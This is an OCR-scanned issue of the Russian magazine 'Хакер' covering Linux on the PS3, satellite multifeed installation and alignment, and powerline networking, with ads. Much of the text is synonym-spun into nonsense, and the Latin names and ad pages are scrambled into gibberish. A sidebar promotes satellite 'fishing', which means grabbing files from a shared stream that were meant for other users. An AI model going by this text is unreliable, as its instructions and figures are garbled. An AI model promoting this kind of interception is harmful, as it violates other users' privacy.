равно сердце компьютера СеІІ? Дело во том, почто база бтих охватывает инструкции пользу кого взаимодействия от псевдо-фа йловой системой  вриів. Подразумевается, что-нибудь единолично с ВРЕІ бросьте выделен чтобы размеще-  ния виртуальной файловой системы, посему размещенным со временем прило-  жениям нисколько неграмотный игра стоит свеч взаимодействовать вместе с ним. Естественно, изумительный по всем статьям  этом задействован от земли не видать уровень, для которому простому пользователю либо — либо даже если программисту автоматизированный отнюдь не подойти, посему во качестве интер-  фейса в целях выполнения вычислений нате отдельном ядре используется  читабельная в области АРІ равно понятная с целью С-программиста книжное собрание Иі Ь5РЕ.  Теперь маленько отом, в духе одна с самых популярных Ореп-Зоыгсе  платформ в конечном счете в борту игровой приставки. Процесс установ-  ки хватает прост: ради основные положения тебе приходится подготовить базисный  дистрибутив не без; ОС, зачислить его сверху болванку да засадить на препровождение консо-  ли. Далее долженствует операция: выбираем Зувіет ЗеІІІпдв |под5еіІіпдв на  стартовом меню), жмем I пзбаіі апоІИег 05 — начнется операция поиска  инсталлятора. Соответственно, ежели некто найден никак не будет, в таком случае дистрибутив отнюдь не  удовлетворяет запуску нате Р53, равным образом его требуется обменить для что-нибудь другое.  Если но весь как рукой сняло гладко, так появится траектория найденного инсталлятора равно потребуется одну крошку подождать. Приглашение командной строки  указывает держи внутренние резервы установки: ІПБіаИіехі — текстовая, Іпвіаіі — гра-  фическая. Следуй во всем шагам, вроде получи и распишись обычном ПК. Чтобы пустить только лишь что-то установленную систему выполни: «(ЗеІІІпдв) -> (Зувіет ЗеІІІпдв]  (Оеіаиіі Зувіет] -> ОіИегОЗ».   В ЗАЧЕМ НАМ ТАКИЕ МОЩНОСТИ?   Конечно, безвыгодный только лишь с целью взлома паролей! Разработки уж издревле равно динамично  применяют во области науки — с целью обсчета траектории точек крыла  самолета, решения нелинейныхуравнений во инженерии равным образом многого  другого. Здорово, ежели твоя милость почерпнул изо статьи отчего-то новое, однако помни, почто базис — кинуть сие деяние на нужное русло! ЦС     ХАКЕР 01 /119/ 08       Ыікоп   Основа изображения     Первая на мире зеркальная фотокамера вместе с функцией еженедельник видео высокой четкости   К ЕС*      гл/ ГСП нэті     190     V.     " 0 0 г Э-ммагике«пкпйР КЛ ОП •^□■чмиа фсфмчати N Ѵэп &Х  * Система обработки нтбрале-ниті ІХРЁЁЬ 0 00 спе-я ми*  - Системе рскгюзлдроінмі сч.к*сен  со функун<і& рдаюімр-  іініі * ^сіойишін ѴОА ЖК-мбдогер е ф^р-ніи^й №ѵ<  Ѵйвѵ* 0 *ацти-р*і*ікіи ічбэр ю імбкносіей обработки Сии^>ор  л шилрв ■ И чмоіе циоинрі ф^ыщні іопнен НО в^ідес     Ыі^ФП кт: пріягтф фотокамера. Это МІпя      МІККОР      Г»*Т/|ЧГ 0 ■ 0 №Н  < ЮТ ДОпВД* нкмУУи  >и г^амнФми -ігач"        ‘ ТиФнСі ГАФйфф«Тйр*чгч-Лі     |ЯН: ."‘іДОІУО «ЛМ#.ЛІІМ»Я.ІѴ       "ВАСИЛИЙ АЛТУХОВ)     ид? И какое касательство каста приемчик имеет     СЧто вслед от тран ное речь  4к спутниковой антенне? Как дозволено пустить в ход до некоторой степени спутников од  ^новременно, нежели паче всего делов перенимать файлы вместе с через «рыбалки*  — со по всем статьям сим ты да я да постараемся разобраться.*» ~ ^ |р * мультфильм     СПУТНИКОВЫЕ   ТІРБЫТРІСКБ^     "ХИТРЫЕ ПРИЕМЫ ДЛЯ СПУТНИКОВОГО ИНЕТА И ТВ     Н МОТОРЫ И МУЛЬТИФИДЫ   В сентябрьском номере вслед за сей годочек автор сейчас рассказал, ради а нужен  спутниковый мотор, равным образом какего настроить. Для тех, кто именно безграмотный читал, повторюсь: сердце нужен ради приема множества спутников для однуантенну. Он авто-  матически перенастраивает ее со спутника бери спутник. Втой статье уж  упоминался мультифид что задача моторизированному подвесу, хотя во рамках одной статьи неисполнимо обхватить за единый вздох все, потому-то по части мультфильм -  фиде расскажу по одному да обстоятельно.   Начнем не без; того, к ась? но некто нужен. Мотор, бесспорно, хорош: практи-  чески совершенно спутники  со ним доступны, так глотать да недостатки. Во-первых, симпатия хватит за глаза медленно (до 0 минуты) перенастраивается со спутника получи и распишись спут-  ник. Во-вторых, тебе кровь из зубов захочется владеть допустимость думать разом до некоторой степени спутников одновременно, скажем бери одном «рыба-  чить», а для другом кинематограф не так — не то король спорта посмотреть. Как крата во этой ситуации равным образом  выручит мультифид.   Мультифид лишен перечисленных недостатков (хотя у него найдут-  ся свои). Обычно его используют чтобы приема спутников, располо-  женных неподалёку косновному, — какбы на придачу. Не не так многократно  мультифид применяют держи моторизированных антеннах пользу кого приема  спутников  со другим типом поляризации: например, угловой поля-  ризации, как бы сверху известном спутнике Еѵѵіеіваі ѴѴ4 (НТВ+ равно Трико-  лор), а вот и все спутников другого диапазона, например, С-Ьапб, равно как получай Ямал 001 .   Пожалуй, самым существенным недостатком мультифида допускается обозвать махонький пристанище отклонения отосновного спутника. На практике спирт эпизодически превышает 00-1 0 градусов в среде орбитальными позициями  (и, наравне правило, сего совсем достаточно). Скажем, меленький проект  мультифида — сие коренной спутникЕігіыв 0Е; в нем убирать неплохие  интернет-сервисы, вспомогательный НоіВігсІ 03Е равным образом большущий избрание  телевизионных каналов. Вариантов существует много, где-то почто всё-таки увлекаться  висит ото твоих пристрастий и, знамо же, ото физической внутренние резервы  приема необходимого спутника.     В ЛЮБИТЕЛЯМ СПУТНИКОВОГО ПРИЕМА   Чтобы было понятно, постараюсь растолковать получи и распишись примере из обычным  зеркалом. Трудно откопать человека, тот или иной бы на детстве отнюдь не запускал  «солнечныхзайчиков». И наверняка,™ славно понимаешь воззрение   — «угол падения равен углу отражения». Атеперь пофантазируем. Пред-  ставь, который возьми небосклоне мгновенно двоечка солнца. Какты думаешь, как долго склифосовский  «зайчиков»? Конечно же, два! И нежели опосля дружок с друга двушник солнца, тем ужотко будутдруг с друга равным образом «зайчики».   Спутниковая диполь также имеетзеркало (правильнее давать имя его  «рефлектор»). Только характер у него безвыгодный такая, каку обычного зеркала,  а параболическая, да от ним безграмотный безвыездно в такой мере просто. Принцип «угол падения  равенуглуотражения»здесьтоже работает, да не без; небольшими ого-  ворками. Сигнал не без; основного спутника отражается с рефлектора да  фокусируется держи конвертере. Атеперь вспомним, который Амальтея во небе неграмотный  один, — равным образом сие еще невыгодный с области фантастики, как бы вместе с двумя солнцами. Ко-  нечно, через рефлектора антенны отражаются сигналы со всех спутников, только лишь фокусируются они невыгодный получи основном конвертере, а на стороне с  него, в качестве кого на примере  со двумя солнечными «зайчиками». Именно благодаря тому  спутниковая антенна, имея одинокий конвертер, может предполагать аппель только лишь от одного спутника. А в чем дело? буде во точке, идеже фокусируется отбой вместе с другого спутника, определить до этих пор одиночный конвертер? Вот оно — чудо!  Именно вязка с двух конвертеров равно называется мультифидом.   Так нуте но наставим столько конвертеров, как вкушать спутников, да довольно нам счастье! Увы, сие л вона мечты. Спросишь почему? Да вследствие этого в чем дело? параболический рефлектортем равно хорош, что такое? возлюбленный фокусируетсигнал со  спутника равно складывается настоящий отбой во фокусе во одной фазе, тем самым  усиливаясь. Правило действуеттолько чтобы одного источника сигнала   — того, возьми каковой нацелен рефлектор. Сигнал не без; других источников равным образом  фокусируется, но, во-первых, искусство достаточно размазанным, а во-вторых, аппель короче направляться от разбегом в области фазе равно интенсификация туточки меньше.   И нежели значительнее неправильность с основного источника сигнала, тем побольше разляпанный чудеса равно меньшее усиление. Отсюда вывод: мультифид     ► 034     ХАКЕР 01 /119/ 08        рс_гсіпе     > ѵѵагпіпд   Работая получай крыше, прощай нечеловечески ос-  торожен равным образом используй  страховку!     > СІѴСІ   На дискеты найдешь  дополнительные  материалы потеме.     Самый всегдашний мультифид: складно равно несложно   имеетограничения поуглу отклонения равным образом поусилению. Поэ-  тому ради приема получи мультифид пристало разбирать спутники, неподалёку расположенные получи и распишись орбите, равно ради фундаментальный сопутешествователь надо пить тот, кто  со меньшей мощностью, ибо ась? побольше монументальный кавалер попроще хорэ во хмелю получай следующий конвертер, снятый с фокуса.   Что такое мультифид, твоя милость еще представляешь, в настоящий момент хорошо  бы разобраться, во какуюточкуустановить другой конвертер.  Здесь придется накопиться терпения, вследствие чего почто формулы  расчета громоздкие равно пугающие. Самые сложные формулы   — сие расчетугла места равно азимута направления держи спутник.  Если твоя милость привык выцарапывать токмо своими силами, могу призвать глянуть формулы на статье относительно мотор. Ну а тем, который безвыгодный желает себя затруднять, предлагаю скачать программу  БаІеІІИе Апіеппа Аіідптепі получи ШрУАллл/ѵѵ.аІ-зоК.сот/заа/  5аИп(о-ги.вЫ:т1   Для определения места размещения второго конвертера  нам должно распознать разницу в ряду азимута ми да углами  места основного равно дополнительного спутников. Рассмотрим  пример: фундаментальный сопутешествователь — 0ігіиз 0Е, прибавочный   — НоІВІгсІ 03Е. За свою практикуя в свое удовольствие натренировался не без; формулами, посему воспользуюсь программой да возьму  готовые результаты углов сих спутников чтобы Москвы.   Зігіиз 0Е Ат - 018.0 Е=20.0     Значения смещений автор получили, во исключительно много сме-  щать: в левую сторону или — или вправо, ввысь или — или вниз? Запомни закон  — передвигать приходится на зеркальном направлении отположения  дополнительного спутника насчет основного. Встаем следовать антенной с лица для спутникам. Прямо, по части направлению ан-  тенны, находится стержневой попутчик |в нашем случае — Зігіиз  5Е), восточнее (левее) короче НоІВІгсІ 03Е — дополнительный.  Согласно расчетныхуглов места, дьявол находится выше, нежели  Зігіиз 0Е. Применив начало зеркала, получаем, что-нибудь второстепенный конвертор повинен существовать смещен западней (правее) равно ниже, условно основного.   Вот на этом месте автор этих строк тебя потребно крошечку огорчить. Здорово было бы открутить следующий конвертор дома, во тепле да уюте, послать ко всем чертям по сию пору смещения равно не без; чувством выполненного долга поставить ан-  тенну сверху крышу. Так далеко не получится! К сожалению, однако сии подсчеты безграмотный дают напрочь точного результата, отчего который электромаг-  нитная волна, отражаясь через рефлектора, ведет себя маленечко  иначе, нежели линия света, выраженный отзеркала, да разность на сме-  щении, возьми хоть небольшая, да есть. Поэтому расчетные значения  приблизительны равным образом используются исключительно пользу кого предварительной  оценки места установки второго конвертера. Окончательная набор производится помаксимумусигнала.     НоСВігсі 03Е Ат=209.1 Е=22.7   Разница аз=8 . 0 е=2 .7° Н КРУТИМ ГАЙКИ     Разницу посередь направлениями для сопутник наш брат знаем. Для  окончательного расчета нужен пока что сам сообразно себе параметр — фокус-  ное протяжение антенны. Для прямофокусной антенны целое  просто: сие промежуток ото центра рефлектора впредь до конвертера.  В случае из офсетной антенной состояние обстоят капельку слож-  нее, вследствие чего чтоунее неоткуда прикинуть истинное фокусное рас-  стояние. Погуглив на справочниках за геометрии, произведя  массу сложных расчетов, не грех дознаться накануне истины да вдоволь  лучить заветное число, да сверху практике шабаш распознать протяжённость с нижней кромки рефлектора по конвертера.   Это количество короче больше всего близким для фокусному расстоянию  офсетной антенны.   Допустим, у нашей антенны фокусное промежуток Р=600 мм.  Рассчитаем снятие в области вертикали да горизонтали:     Утомил теорией? Наверное, шуршики чешутся что-нибудь при- уходить да покрутить?Уговорил, переходим для практике :).   Нам понадобятся:   1. Второй конвертер.   2. Переключатель ОіЗЕдС, к подключения двух конверте- траншея ко одному приемнику.   3. Кронштейн чтобы крепления второго конвертера.   Конвертер да коммуникатор купи влюбом магазине оборудо-  вания спутникового телевидения. Кронштейн не возбраняется укупить дальше же, хотя ваш покорнейший слуга сплошь и рядом изготавливал его сам с   двух резьбовых шпилек Мб равно двух сантехнических хомутов.  Сантехнические хомуты изначально предназначены на  крепления водопроводных труб для стене равно бывают разного  размера. Подбирай эдакий хомут, дабы спирт густо обхватывал да зажимал «шейку» конвертера.     ХАКЕР 01 /119/ 08     ► 035       Хинты по мнению спутниковой рыбалке     Поток данных со спутника одинаков на всех: транспондер далеко не может выслать эмпирика чтобы одного конкретного пользователя, оттого  передает «заказанные» файлы во всех отношениях сразу. Определить, что такое? сия пакет  потока предназначена пользу кого него, — загадка раскованно поль-  зователя (вернее сказать, его оборудования да софта) . Естественно, около желании позволяется уговаривать вмиг цельный поток, равно присутствие помощи  специальных граббегов (сниферов) выуживать файлы, которые получи и распишись  самом деле были переданы другим пользователям. Такой прием, во вкусе пишущий сии строки уж в оны годы рассказывали, называется «рыбалка» сиречь «фишинг».  К сожалению, проект 0ку№1, являющаяся первопроходцем во этой  теме, в большинстве случаев безвыгодный развивается. Зато разработкой занялись группы энту-  зиастов, которые выпускают небо и земля ее модификации. Например, известный мод с К.ТОО (вверсияхкакдяяѴѴт32,такиІіпих) имодот  50ККУ (он но ВеіаЗку) . Помимо сего огромную понятность завоевал вместе с нуля начерканный цель — Маппа ргсдесі (ѵтаду.таппа-ргоіесІ.пеЕ ) .  Если на полном серьезе решил предпринимать рыбалкой, прощай будь по-твоему для ежедневной  работе по мнению разбору всего делов того барахла, которое перехватит файл-  граббер. Его хорошенького понемножку отнюдь не прямо-таки много, а сильно много. Чтобы  облегчить себя жизнь, рекомендую позаимствовать нате заметку небольшую толику  инструментов:     Оііаіагіопе і .2 Г етеІѵа.Зсіп.ги ) — миниатюрная, только ахти полезная обслуживающая программа про определения типов файлов равно автоматического их весь  именовывания. Невероятно полезна поскольку того, в чем дело? перехваченные  файлы почасту оказываются кроме расширения на принципе.  8ку8огіег ( трЗйзЬег.пагоб.ш) — мощная план к сорти-  ровки файлов, полученных снифером со спутника. Автоматически  распаковывает многотомные архивы, подбирает для ним пароль,  переименовывает птрЗ,  файлов по части информации изо ГОЗ тэгов ѵі равно  ѵ2, а в свой черед сортирует графические файлы да видео.   С1опе8ру ( игѵѵтѵ.сіопеврѵ.сот ) — компактная бесплатная обслуживающая программа чтобы поиска дубликатов файлов со множеством интересных решений.  И снова единовластно хинт. Иногда отдельный части архива некого перехва-  ченного файла оказываются битыми alias общо теряются. Поте-  рянную порцион не запрещается опробовать пошарить на интернете, так удается сие на покромка света безграмотный всегда. Куда попроще найти ее у таких но рыбаков, равно как да ты. В сих целях иные энтузиасты поднимают специальные  «серверы ради ремонта», идеже некоторое пора (обычно вблизи недели)  хранят весь отснифанные файлы. Актуальный роспись серваков во всякое время доступен здесь: Ьігр : / /ѵіассезз&ее .Ьіг /(отит /зЬоѵѵгЬгеасІ .  рЬр?г=27753 .     Если строй конвертеродержателя нате антенне безвыгодный позволяетзакрепить воротник для «шейке» конвертера (элементарно безвыгодный хватит места), так позволено позаимствовать милиционер большего диаметра равно врезать его следовать облучатель (за «голову» конвер-  тера). Далее— смотрим фотографии от подробным описанием.   Кактыуже, наверное, обратил внимание, нате каждом изо сих мультифидов своя агрегат кронштейна. Делались кронштейны изтого, что такое? было по-под рукой :].  Тебе равно как шишка на ровном месте невыгодный запрещает взять на вооружение смекалку равным образом совершить по-своему; самое  главное, с тем преобразователь был в состоянии пользоваться двум степени свободы — по мнению горизонтали равным образом  вертикали, равно крепко фиксироваться в памяти во нужном положении.   Вооружился по всем статьям необходимым? Можно учинать кустановке антенны вместе с мультифидом. Не исключаю, что-то эту статью читает человек, начисто неграмотный представляющий, во вкусе юстировать спутниковую антенну. Опишу, пожа-  луй, поподробнее процедуруустановки равно настройки.   Итак, первоочередная загадка — спровоцироваться нате базисный спутник. Для основания нужно облюбовать равным образом подготовить простор установки. Место выбирай так, с целью в соответствии с направлению нате сопутник (а лучше, возьми во вкусе допускается хлеще спутни-  ков!) никак не было никаких преград — зданий, там, другими словами деревьев. В идеале, полагается ускальзывать даже если натянутых проводов по мнению направлению приема. Азимуты сверху  спутники твоя милость можешь подсчитать близ помощи программы ЗаіеШіеАпІеппа  Аіідптепі. Определить тенденция по мнению азимуту держи месте не запрещается рядом помо- щишки компаса, так компаратив будет, разве твоя милость рядом помощи этой но программы пос-  читаешь, на какое сезон устремление получи свет полноте подобный из азимутом.  Учитывать надлежит уже ито, в чем дело? антенну нужно вставить что дозволяется  надежней: хорошо, даже если сие достаточно сверху капитальной стене здания. Немало-  важно, воеже тебе было складно регулировать антенну; редко, конечно, в такой мере  получается, так взвесить этотмомент есть смысл заранее. Настраивая антенну  впервые,™ проведешь недалеко нее массувремени.   Надеюсь, сколько опору твоя милость закрепил полно надежно. Теперь тебе необ-  ходимо запастись линейкой да отвесом — равным образом воплотить в жизнь предварительные  расчеты. Рассчитай близ помощи программы угловая точка места про спутника равно румб офсетности твоей антенны. Отняв отугла места ракурс офсетности, да мы из тобой получим угол, получай что в долгу бытовать наклонен отражатель антенны условно вертикали. Если циферка получилась положительной, ведь ан-  тенна хорошенького понемножку стремлять вверх; неравно отрицательная,™ вниз. Не пугайся, даже если  тебе покажется, сколько аппарат смотрит на землю. Это исключение офсетной  антенны — держи самом деле «луч» приема короче направлен сверх горизонта.  Угол наклона антенны у нас есть, осталось чисто его выставить. Для сего нужно распознать внушительный поперечник антенны да усилить сие достоинство для функция угла наклона — тем самым получив длину одного с катетов пря-     моугольного треугольника. Его гипотенузой является отрезок, бегущий держи  плоскости антенны равным образом равнозначный в области длине большому диаметруантенны.  Вешаем антенну в опору равным образом выставляем вершина наклона, в духе показано получи и распишись  рисунке. В данном случаеугол наклона положительный. Если онутебя  получился отрицательный, в таком случае линейку нужно хорошенького понемножку соединять снизу.  Если твоя милость настраиваешь спутник,  которого малограмотный весьма отличается через направления получай полдень (до 05 градусов), так преобразователь следуетустановить  вертикально. Когда  спутника здорово отличается с направления в юг, так поверни конвертор соответственно караульный стрелке, буде Амальтея ближе ко  западу— да противу магазинвахтер стрелки, кабы ближе квостоку. Направле-  ние поворота нужно определять, стоялицом кспутнику. Поворачивать умформер нужнотем сильнее, нежели хлеще отличается азимутспутника с направления бери юг. Максимальный румб поворота возьми самых крайних  спутниках — малограмотный сильнее 05 градусов!   Для конвертеров из циркулярный поляризацией вращение малограмотный имеетзначения, подбадривать его позволяется какугодно. Для конвертеров С-Ьапб вместе с угловой поля-  ризацией пристало обернуть его так, дабы вода, попавшая во волновод, никак не затекала на электронный блок. А вливаться водыка может всего лишь во тех  местах, идеже во волновод входят приемные зонды (штыри).   Если откос рефлектора выставлен верно, — сие 00% успеха. Останется всего заворотить антенну во нужном направлении. Шансы получи удачную доставать  стройку увеличатся, когда ты, рассчитав быть помощи программы ЗаіеШІе  Апіеппа Аіідптепі время, рано или поздно свет находится на направлении соответственно  нужному азимуту, заметишь тот или другой ориентир, идеже полноте разыскиваться соль во расчетное время, да приустановке направишьантеннуна него.  Совет: используй, как бы прицел, штангу конвертеродержателя.   Идеальным вариантом будет, даже если к контроля сигнала твоя милость вытащишь при-  емник равным образом жопа (ну, другими словами принтсервер равно монитор) ко месту установки. Иначе  тебе потребуется помощнике рацией или — или телефоном, какой короче конт-  ролировать степень сигнала равным образом извещать насчёт нем. При настройке спутникового  телевидения бери компьютере позволено выехать программой РазІЗаі  Ріпбег, которая умеет голосом зачитыватьуровень сигнала (необходимо только лишь растянуть веревка кинетика равным образом выволочить его не без; лицом возьми крышу).   Лучше, еслиутебя будут формат безоговорочно рабочего транспондера со  спутника, какой-никакой твоя милость настраиваешь. Найти формат транспондеров дозволено бери сайте "ллотѵ.ІѵпаваЕсогп . Итак, собираем схему, включаем все,  выставляем рабочие руки границы транспондера и, включив приемнике ре-  жим контроля сигнала, начинаем долго поворачиватьантенну. Здесь  нужно учитывать, сколько приемнику нужно некоторое время, дабы залочить     ► 036     ХАКЕР 01 /119/ 08     РОХСОПП     чѵѵѵѵѵіохсопп.ги     /1               С вязана дурак лрсштссоряй І1Ю РЬ-шжі   Поддчфжчй про^мсерйв ано Ртегчт"- да   тсі:іюлсл*4і И-^ТгрглррП"”" ЗЛ к увеличения пропускной епювбнктн чеждуСРи   и-сжтоюй   Пг г.парлм СгобвРігоІІ   Поп*." , Р!ккй тёЕнб№"4!гі Онколе*"" абеел&чиврег   ^срлвжзинц»; НИОНЬНТН рКІіИреиИЯ 00 грации     Л ІнЗНіЛЫіН 00і)Н   высокой ’чеііікосгтмі [ІиаІ іеціійі Йіііііо   НА^ЛамДЛЙЫ ИОВДоЛСЛЬМОЙ ТОччОСУьй  восгірои»аде«ия звука іС/игвдря  гор п*С *чнрл плшіын лудли ®Тй ССЙч№СТ ІІ ’ н Ооіііу  ОфЕаІ Ьче” равно аитночі&ічги си-н^пй ко луму ІОбдБ   ОйшерАнн папинпн ПивІ ЛППіІ ШПИі**     С 0 Пгцда"Р"мимрт прлчщсс»^ РІИАЗІЛ-"М, РЬвппш - 0фС**4 ЛИ * ■ і(Нкні- 0л   й ІГпдд»рміны«і Иурсч ІипіішгІ I . НП"ІКШѴЯІІІ прилижк ПУН ГіЯіііЖ ■ ■■!» »л , ЕИ1 ж  ВИН ИОВ   О П*МГ|. О.ІМ М»*Л КУНГИ * >> ЩОІ *Ч » №И*ІНГ рВЧН Ніг )   О 0"РОе • !(№1ХІ( поиериг# Гіи шт* І’кІВ]   О .Г.1-Е#ШЛЫІЫ1І 0*ірші«чіж4(ч«иктн • ‘ * >»ЧИ»^ШШ5И Г*ІНШЖЭТ* •   ІЙВМСГ- да Ъиі Чч Ы(|ІЫ Ііи"   О ііМі ТІ- ■ ■•. і > "и - - л фчсиіныв ечимііиііі* интересах 0шіьшы ііадапіктн на   ПрОН »ПП1»Т*-ЛІН1>ГГН ГН-ПІГНЬ-     0     Магии: РчЛот - (4Ч5уГ»М03; ЧѵнІИіи.- г і|4м;[Ш-С 0І; АрІлііт іінмщп - (4И;73Ь МИК!,: ДИйІЛ - [«5? Г ИИ "Ш".7;   >64^-» МгТіЪф №+ФРОвОЙ (*>!]?» Ж», Ич*н* І+»]Э*1-6І4ІІ КИЕЕРІЮЛ1КЛ <495!®4-2Я1: № К»*ну«™вйік  ійЛІОРІ - узы «ппстерныг нататы - {■‘і"й"іШ-АШ; Сссып ПлЬэр-этсцѵті - 0<!п1!йМЗСй; Зорум-Цеп-р   Ъінкгипс №№і«і^нк№іииѵ ■ ДОЩВВЗД Влрмул - Члѵл [МЙЗ>Ы-НіІ0; Ыпн«я: т*. - («ЕЩЮ-КИЕ Онпсрннбург ",и*«-<М))?І-М6в:  ~;мг.ійіі "|М1)37». Л>Л! Интеле* ЧЬрг гчѵкиі ІІі’-пр ■ ( ЗПЭЪШВИ; Курен" ЭИТРТКЛЯП) " (4ЛЗі51^5П1 : Коюсибирсн ‘СТА - 0 0Л1?)КМ-ЗР! ГІ  шрми: ьЬ<Ч0Те»«ВД"І- [Ж)Ш464& П#ДОДО; Ллпи.ія ■ (ВЧ1|ДЭ ШР1: Вкм-Р^ДмуаврЦ - («Эі»? *.в"Л; Смр* *>хлг ■ :М;.г?П УМ     1ЙАН1Ѵ «РСГРМП Т"У*-*"! Г                 Зігіііа ЕЕ     нонвер"зео     «эѳртор     Устройство мультифида 0     Угол наклона антенны у нас есть, сейчас его нужно верно выставить.  "Для сего нужно зафиксировать великоватый калибр антенны равно произвести умножение сие ■*  Значение получи синусугла наклона, тем самым получив длину одного изо к*  катетов прямоугольного треугольника, гипотенузой которого является" .  "отрезок, распростирающийся бери плоскости антенны да адекватный подлине большому  і диаметру антенны. Вешаем антенну бери опору да выставляем угловая точка наклона  [как показано возьми рисунке- _А | Дг ,1     Делаем крепь с целью второго конвертера не без; через сантехнического  [хомута равно шпильки^Хі —     сигнал, потому спешить на курьерских отнюдь не следует. Чаще общем получатель индицирует двум шкалы: фанфара да качество. Большее первый план нужноуделять шкале  «качество», — в частности возлюбленная отображаетуровень полезного сигнала.   Когда твоя милость повернешь антенну на нужном направлении равно появится высота по мнению шкале «качество», нужно будетточно взвести антенну равным образом запеть  крепежные гайки. Контролировать истина настройки можно, разве гнуть антенну, чуть-чуть потянув следовать ее край. Сигнал потребно уменьшать-  ся подле отклонении вот всех направлениях (вверх, вниз, налево равным образом вправо].  Только позднее сего дозволяется считать, что-то антенка настроена точно.   Если твоя милость настраиваешь антенну для сопровождающее лицо вместе с линейной поляризацией, ведь  нужно до сей времени подкорректировать структура конвертера — без запинки вращая  его, вырвать наибольшего сведения шкалы «качество».   Освоив настройкуантенны держи опорный спутник, твоя милость вне труда настро- вишь мультифид. Нужно забронировать дальнейший бессемер на расчетнуюточку да познать приобрести сигнал. С вероятностью 00% аппель будетсразу.  Подстрой месторасположение конвертера сообразно максимуму уровня, перемещая  понемногу вверх, вниз, влево, о десную — да затяни крепления. Не не обращай внимания  подстроить преобразователь за максимуму сообщение а, вращая его около оси, круглым счетом  же, на правах присутствие настройке получай первый спутник.   Н ПОДВОДНЫЕ КАМНИ И КАК ИХ ОБОЙТИ   А теперь автор этих строк постараюсь обгородить тебя через неприятностей, которые могут показаться по мнению причине неправильного выбора оборудования, установки либо настройки.   1. Антенну ради установки  со мул ьтифидом не чета отбирать офсетную  длиннофокусную. Прямофокусная антенна, чаще всего, короткофокусная равно путево неудобна с целью монтажа мультифида. На длиннофокусной  антенне мультифид работаетэффективней.   2. При выборе переключателя БіБЕрС нужно полюбопытствовать у  продавца, до какой степени непрочно пример работаете вашим приемником.  Достаточно то и дело наблюдается нестабильная служба иначе хоть несовмес-     тимость приемника из переключателем. Брать скорее за единый вздох искатель в хорошо входа — стоят они та ко же, каки получи двуха входа, а довольно вслед отказ для  расширение.   3. Если твоя милость устанавливаешь мультифид во связке не без; мотором, включай переклю-  чатель до схеме: конвертеры — селектор — моторчик — приемник. Если твоя милость включишь дешифратор поперед мотора, в таком случае течение питания мотора пойдет от  переключатель, а спирт для такие нагрузки никак не рассчитан равным образом может иссякнуть изо строя.   4. Когда изготавливаешь держатель мультифида, не грех его изготовить  длиннее, нежели нужно по мнению расчетам. Во-первых, тебе нужен репертуар с целью регу-  лировки. Во-вторых, безвыгодный исключено, который на будущем захочется перенастро-  ить мультифид бери иной спутник. Также ни одна душа малограмотный запрещает поста крутить незаинтересованный конвертер, единаче сверху одинокий спутник, тут клад да пригодится. Нужно лишь л вишь усвоить до оный поры одинокий сантехнический ярем да прикрутить его на нужном месте — сверху те а шпильки.   5. При подключении переключателя для центральный портал включай ведущий  конвертер. Даже разве искатель выйдет изо строя, ранний ввод  останется во работе.   6. Закрепи подле антенны половинку пластиковой бутылки (дном вверх] равным образом помести во нее законнекченный переключатель. Это самый безопасный сноровка спасти дешифратор с попадания влаги.   7. Если диполь устанавливается на труднодоступном месте, в таком случае неграмотный поле-  нись равным образом настрой мультифид получи и распишись земле, зафиксировав антенну получай подходящую  стойку. Установив антенну сверху штатное место, тебе останется лишь только под- приспособлять быть необходимости вершина места бери антенне да месторасположение  мультифида (вверх-вниз]. Корректировки, поскорее всего, неграмотный избежать, поелику аюшки? стойки могут равно арестовывать разнородный пеленг наклона, же буква операция  существен да упростит настройку.   8. Перед началом установки да настройки постарайся уточнитьузнакомых, который быть ни мает требующийся спутники что за транспондер самый сильный, — спирт  понадобится интересах первоначального наведения антенны. Ата кже пригодит-  ся самый слабый: в области нему уместно будетточно выверить антенну. ЗС     ► 038     ХАКЕР 01 /119/ 08           • Безопасность   САМЫЕ СОВРЕМЕННЫЕ СПОСОБЫ ЗАЩИТЫ     А51І5 ТгепсІ СІиЬ - сие клоб про тех, кто такой всякий раз хочет существовать на курсе актуальных  тенденций решетка современных технологий. Наши эксперты выбрали 0 основных  направлений, на которых склифосовский организовывать работу Тгепб СІиЬ - развлечения, новинки,  безопасность, феррум да бизнес. Ежемесячно вас будете обретать самую свежую  инсрормацию сообразно на человека направлению изо журналов* равно уходить во интерак-  тивный вселенная клуба в сайте ѵѵѵѵѵѵ.АБУЗТС.ги.     Железо     ВСЕ САМОЕ ИНТЕРЕСНОЕ ИЗ МИРА КОМПЬЮТЕРНОГО ЖЕЛЕЗА      Новинки     ОБО ВСЕМ НОВОМ И УНИКАЛЬНОМ, ЧТО ЖДЕТ НАС В БУДУЩЕМ     Бизнес     ПОСЛЕДНИЕ ТЕХНОЛОГИИ И ТРЕНДЫ УСПЕШНОГО БИЗНЕСА     Развлечения     ВСЕ, ЧТО НУЖНО ДЛЯ СОВРЕМЕННОГО ОТДЫХА     - журналы-участники проекта: «Страна Игр», «МАХІ іипіпд», «Свой Бизнес», «Железо», «Хакер», «Мобильные Компьютеры»       ^А^ІАІіаМІАЛТЬ САМЫЕ СОВРЕМЕННЫЕ СПОСОБЫ   ОС^рОІІЯѴІЮС I Ь ЗАЩИТЫ     ЖЕЛЕЗО I НОВИНКИ | РАЗВЛЕЧЕНИЯ | БИЗНЕС | БЕЗОПАСНОСТЬ     А $11$ Р1   Защищенный ЕІЬегпеІ объединение обычной электропроводке   Автор: Степуха Ильин   В стремлении отделаться ото проводов ты да я испробовали многое.  Очевидным решением похоже пользование сетей ѴѴі-Гі (осо-  бенно не без; учетом появления высокоскоростного 002.11л). Но смотри  незадача: равно беспроводная трал невыгодный решает проблему полно-  стью! Три-четыре стены - равным образом паршивый сообщение с точки доступа сделано «не пробьет». Не стать а мгновенно дергать витую пару,      тщательно маскируя линия по-под плинтусом? На самом деле,  провода, которые понадобятся на твоей квартире - сие обычная  электрическая проводка. Не нужно тянуть «витуху» на каждую комнату - всю черную работу сыздавна выполнили после  тебя строители. А производители сетевого оборудования сде-  лали возможным сие использовать.     Как сие работает?   Технология Роѵѵегііпе появилась единаче десятилетия назад. Тогда низ-  коскоростные (скорость подчас ниже, нежели 0,01 Кбит/с) технологии  стали истощить на энергетике сверху высоковольтных магистралях  - к передачи технической инсрормации, например, касательно напряжении получи и распишись подстанциях. Похожие правила используются производите-  лями чтобы работы по-над технологией РІ_С (Роѵѵег І_іпе Соттипісабоп),  позволяющей вручать материал нате скоростях на десятки Мбит/с. И шарашка А51І5 - тут, естественно, неграмотный исключение.   Отправить причина соответственно обычной проводке, идеже подо высоким  напряжением передается электроэнергия, - проблема сейчас самочки согласно себя непростая, а из учетом российских реалий  усложняется вдвойне. Сплошь равно недалеко - ветхие 